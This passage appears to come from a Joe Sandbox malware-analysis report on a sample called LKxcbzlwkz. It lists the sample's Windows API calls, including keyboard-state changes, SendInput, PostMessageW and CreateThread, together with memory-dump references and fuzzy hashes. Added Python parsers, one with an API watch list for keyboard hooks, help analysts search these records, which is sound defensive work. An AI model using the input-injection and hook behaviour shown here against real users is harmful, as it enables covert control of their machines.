  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
• ___fls_getvalue@4.LIBCMT ref: 00413D2B
  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
• ___fls_setvalue@8.LIBCMT ref: 00413D3E
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
• ExitThread.KERNEL32 ref: 00413D4E
• GetCurrentThreadId.KERNEL32 ref: 00413D54
• __freefls@4.LIBCMT ref: 00413D74
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 259663610-0
• Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
• Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
• Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
• Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
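The three entries above follow the same export layout: an "APIs" list in which direct calls sit at the top level and calls made one level down are prefixed with "Part of subcall function ADDR:", then the memory dump source and the similarity fields. Two of them issue CreateThread (call sites 00413DF4 and 00436CCA) with the start routine that Joe Sandbox recovered as the third argument. The parser below is an added example written for this page, not code from Joe Sandbox: it turns such a listing into records, drops the "Download File" link residue the export leaves on the Associated lines, and exposes the thread start addresses and call sites for pivoting in the disassembly. The sample text is constructed from lines of this report with the export's indentation removed and only a subset of each entry's fields; the label Function_00036C2B is kept exactly as the report prints it.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: two function entries in the shape of the Joe Sandbox "APIs"
# listing on this page (names, addresses and hashes as shown there), trimmed to a
# few fields each. Not a complete copy of the report.
SAMPLE = """\
APIs
• ___set_flsgetvalue.LIBCMT ref: 00413DA4
• __calloc_crt.LIBCMT ref: 00413DB0
• CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• String ID:
• API String ID: 155776804-0
• Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
APIs
  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
• DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
• CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API String ID: 1957940570-0
• Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
"""

SECTION_HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "Name.MODULE(arg,arg), ref: ADDR" or "Name.MODULE ref: ADDR", optionally
# prefixed with "Part of subcall function ADDR: " for calls made by a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<name>[\w@]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
META_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                       # call-site address inside the function
    subcall_of: str | None = None  # set when a callee, not the function itself, makes the call


@dataclass
class FunctionEntry:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)  # Source File, API ID, hashes, ...


def parse_listing(text: str) -> list[FunctionEntry]:
    """Split a Joe Sandbox function listing into one FunctionEntry per 'APIs' block."""
    entries: list[FunctionEntry] = []
    current: FunctionEntry | None = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":          # every function entry opens with its API list
                current = FunctionEntry()
                entries.append(current)
            section = line
            continue
        if current is None:
            continue                    # text before the first entry
        # Drop the bullet and the "Download File" link text the export leaves on Associated lines.
        body = line.lstrip("• ").removesuffix("Download File").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m is None:
                raise ValueError(f"unrecognised API line: {body!r}")
            args = m["args"].split(",") if m["args"] else []
            current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
        else:
            m = META_RE.match(body)
            if m is not None:           # repeated keys (Associated) keep the last value
                current.meta[m["key"].strip()] = m["value"].strip()
    return entries


def direct_calls(entry: FunctionEntry) -> list[ApiCall]:
    """Calls the function makes itself, excluding those attributed to subcalls."""
    return [c for c in entry.calls if c.subcall_of is None]


def thread_start_addresses(entry: FunctionEntry) -> list[str]:
    """lpStartAddress (third argument) of each CreateThread the function issues; '?' if unrecovered."""
    return [c.args[2] for c in entry.calls if c.name == "CreateThread" and len(c.args) >= 3]


def entries_calling(entries: list[FunctionEntry], api_name: str) -> list[str]:
    """Call-site addresses of api_name across all entries, for pivoting in the disassembly."""
    return [c.ref for e in entries for c in e.calls if c.name == api_name]


if __name__ == "__main__":
    for e in parse_listing(SAMPLE):
        print(e.meta.get("API String ID"), thread_start_addresses(e))
```

The subcall marker is kept on each record rather than flattened away, because a CreateThread attributed to a callee belongs to that callee's own entry elsewhere in the report and would otherwise be counted twice when pivoting by call site.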
APIs
• GetClientRect.USER32(?,?), ref: 004302E6
• GetWindowRect.USER32(00000000,?), ref: 00430316
• GetClientRect.USER32(?,?), ref: 00430364
• GetSystemMetrics.USER32(0000000F), ref: 004303B1
• GetWindowRect.USER32(?,?), ref: 004303C3
• ScreenToClient.USER32(?,?), ref: 004303EC
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3220332590-0
                                                                                                                                                                                                                                                            • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                                                                                                            • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1612042205-0
                                                                                                                                                                                                                                                            • Opcode ID: 75906897dd9ed2f3c53199a178064cab79edccc570e08ea2d927de01256d6cf6
                                                                                                                                                                                                                                                            • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75906897dd9ed2f3c53199a178064cab79edccc570e08ea2d927de01256d6cf6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove_strncmp
                                                                                                                                                                                                                                                            • String ID: >$U$\
                                                                                                                                                                                                                                                            • API String ID: 2666721431-237099441
                                                                                                                                                                                                                                                            • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                                                                                                                                            • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2221674350-0
                                                                                                                                                                                                                                                            • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                                                                                                                            • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _wcscpy$_wcscat
• String ID:
• API String ID: 2037614760-0
• Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
• Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
• Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
• Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
APIs
• GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
• VariantCopy.OLEAUT32(?,?), ref: 00451BF8
• VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
• VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
• VariantClear.OLEAUT32(-00000058), ref: 00451CA1
• SysAllocString.OLEAUT32(00000000), ref: 00451CBA
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Variant$Copy$AllocClearErrorLastString
• String ID:
• API String ID: 960795272-0
• Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
• Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
APIs
• BeginPaint.USER32(00000000,?), ref: 00447BDF
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Paint$BeginClientRectRectangleScreenViewportWindow
• String ID:
• API String ID: 4189319755-0
• Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
• Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
• Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
• Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
APIs
• SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
• SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
• SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
• InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
• GetWindowLongW.USER32(?,000000F0), ref: 004490D4
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: MessageSend$LongWindow$InvalidateRect
• String ID:
• API String ID: 1976402638-0
• Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
• Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
• Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
• Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
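The function records above follow one fixed layout (an APIs block of "Name.MODULE(args), ref: ADDR" lines, a Memory Dump Source block, the IDA plugin snapshot name and a Similarity block of IDs and fuzzy hashes), and a full Joe Sandbox report carries thousands of them. As an added example, not part of the Joe Sandbox report or its tooling, the following Python parses that layout into structured records so an analyst can search them for call sites of specific APIs instead of scrolling. The sample input is constructed from two of the records on this page (hash lists trimmed, one "Associated" line left with the "Download File" link text the HTML extraction glues on), and the watch-list names passed to find_records are an illustrative choice.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: two function records in the layout the Joe Sandbox IDA plugin
# uses on this page (values copied from the report, hash lines trimmed; one
# 'Associated' line keeps the "Download File" link text the HTML extraction glues on).
SAMPLE_REPORT = """\
APIs
• GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
• VariantCopy.OLEAUT32(?,?), ref: 00451BF8
• VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
• SysAllocString.OLEAUT32(00000000), ref: 00451CBA
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Variant$Copy$AllocClearErrorLastString
• String ID:
• API String ID: 960795272-0
• Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
APIs
• SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
• InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
• GetWindowLongW.USER32(?,000000F0), ref: 004490D4
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$LongWindow$InvalidateRect
• API String ID: 1976402638-0
• Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
"""

# One "• Name.MODULE(args), ref: ADDR" line of an APIs block.
API_LINE = re.compile(r"^• (?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SECTION_HEADINGS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"   # link text the HTML extraction appends to 'Associated' lines

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int   # call-site address inside the dumped image

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)        # Source File, API ID, hashes, ...
    associated: list = field(default_factory=list)  # other dumps of the same image

def parse_records(text):
    """Split report text into FunctionRecords; every record starts at an 'APIs' heading."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()   # the page carries wide leading indentation
        if not line:
            continue
        if line in SECTION_HEADINGS:
            section = line
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None or not line.startswith("• "):
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                current.apis.append(ApiCall(m["name"], m["module"], m["args"].split(","), int(m["ref"], 16)))
            continue
        key, _, value = line[2:].partition(":")   # first ':' only; 'Source File' values contain more
        key, value = key.strip(), value.strip()
        if value.endswith(LINK_RESIDUE):
            value = value[: -len(LINK_RESIDUE)].strip()
        if key == "Associated":
            current.associated.append(value)
        else:
            current.meta[key] = value
    return records

def api_names(record):
    return {call.name for call in record.apis}

def find_records(records, watch):
    """(record index, sorted matching API names) for every record calling a watch-listed API."""
    return [(i, sorted(api_names(r) & set(watch))) for i, r in enumerate(records) if api_names(r) & set(watch)]

def call_sites(records, name):
    """Every call-site address of `name` across the parsed report, as 8-digit hex."""
    return [f"{c.ref:08X}" for r in records for c in r.apis if c.name == name]
```

Running `find_records(parse_records(SAMPLE_REPORT), {"SetWindowLongW", "SetWindowsHookExW"})` returns only the second record with `SetWindowLongW`, since no hook-installing call occurs in the sample; on a complete report the same call lists the records behind a signature such as the keyboard-hook one, and `call_sites` gives the addresses to jump to in the dump. The parser stores the API ID and fuzzy-hash fields verbatim and makes no attempt to recompute them, as their derivation is not documented on the page.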
APIs
• ShowWindow.USER32(?,00000000), ref: 00440A8A
• EnableWindow.USER32(?,00000000), ref: 00440AAF
• ShowWindow.USER32(?,00000000), ref: 00440B18
• ShowWindow.USER32(?,00000004), ref: 00440B2B
• EnableWindow.USER32(?,00000001), ref: 00440B50
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
